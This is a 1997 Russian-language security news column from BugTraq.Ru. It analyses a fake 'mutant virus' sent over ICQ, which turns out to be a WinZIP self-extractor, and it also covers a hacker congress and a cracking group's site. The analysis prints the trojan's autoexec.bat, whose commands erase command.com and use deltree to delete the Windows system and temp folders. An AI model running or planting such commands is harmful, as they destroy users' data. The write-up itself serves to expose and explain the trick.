информационная безопасность
без паники и всерьез
 подробно о проекте
Rambler's Top100Где водятся OGRыСетевые кракеры и правда о деле ЛевинаПортрет посетителя
BugTraq.Ru
Русский BugTraq
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Модель надежности отказоустойчивой... 
 Закопать Flash 
 Октябрьские патчи от MS и перевыпуск... 
 Microsoft отозвала октябрьское... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / обзор / архив / 1997
АРХИВ
главная
2018
2017
2016
2015
2014
2013
2012
2011
2010
2009
2008
2007
2006
2005
2004
2003
2002
2001
2000
1999
1998
1997




The Bat!

Подписка:
BuqTraq: Обзор
RSN
РВС
БСК




30 декабря 1997, #5

Получил я на той неделе по ICQ некую программку - D&mD.exe, автор которой (UIN 5534022 с очень грамотным ником :) ) утверждал, что сие есть новый страшный вирус-мутант, который не ловится никакими сканерами, имеет чертовски сложную структуру и портит не только софт, но и хард - "Once activated, the person will have to buy a new computer!"

Поскольку до сих пор все мое знакомство с подобными штуками было ограничено слухами об ужасных утилитах, прожигающих монитор или снимающих стружку с жесткого диска, я заинтересовался. При ближайшем рассмотрении сей шедевр оказался банальным self-extracting WinZIP-файлом, в который были запакованы файлы autoexec.bat, 0.COM, BOOT.COM, SCREAMER.EXE и v.pif.

Дальше все было совсем просто - в 0.com лежали вызовы команд erase, copy и rename, сносящие и подменяющие основные (по мнению автора) файлы на компьютере жертвы. Дело завершало копирование заботливо подготовленного autoexec.bat:


	echo off

	c:\windows\boot.com

	erase c:\command.com

	erase c:\windows\screamer.exe

	erase c:\windows\boot.com

	echo Please wait while setup continues...

	rename c:\windows\system temporary

	deltree /y c:\windows\temporary

	deltree /y c:\windows\temp

	deltree /y c:\temporary

	cls

	1:

	echo HaHa!

	echo Your system has been FUCKED!!

	echo FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU FUCK YOU

	goto 1

Как известно, WinZip Self Extractor позволяет подготовить архив, после распаковки которого будет автоматически запущена некая программа - обычно этим пользуются при упаковке дистрибутивов, но, как показала практика, этому можно найти и более веселое применение. Комментарии, думаю, излишни.


А в Гамбурге с 27 по 29 декабря проходил 14-й европейский хакерский конгресс (точнее, Chaos Communication Congress), который ежегодно устраивает Chaos Computer Club. Линки в основном для владеющих немецким, остальные могут получить лишь общее впечатление. Информацией поделился Werwolf, и я надеюсь на его более подробный рассказ об этом мероприятии.


На сайте хакерско-пиратской группы UCL представлены краткая история группы, странички некоторых ее членов, список последних достижений. FAQ для чайников:"Как ломать?", FAQ по взлому HASP. Сайт недавно подвергся переделке, улучшилось оформление, потерялась часть ссылок...


Напоследок - табличка по хакнутым в 1997 году сайтам. Больше всего не повезло доменам .com, .ru места в таблице не нашлось. Не было или никто об этом не знает ? Встретимся в следующем году. С наступающим!

«     »



анонимность клоуны конференции спам уязвимости .net acrobat activex adobe android apple beta bgp bitcoin blaster borland botnet chrome cisco crypto ctf ddos dmca dnet dns dos dropbox eclipse ecurrency eeye elcomsoft excel facebook firefox flash freebsd gnome google gpl hp https ibm icq ie intel ios iphone java javascript l0pht leak linux livejournal mac mcafee meltdown microsoft mozilla mysql netware nginx novell ny open source opera oracle os/2 outlook password patch php powerpoint pwn2own quicktime rc5 redhat retro rip router rsa safari sco secunia server service pack shopping skype smb solaris sony spyware sql injection ssl stuff sun symantec torrents unix virus vista vmware vpn wikipedia windows word xp xss yahoo yandex youtube



Rambler's Top100
Рейтинг@Mail.ru





  Copyright © 2001-2018 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach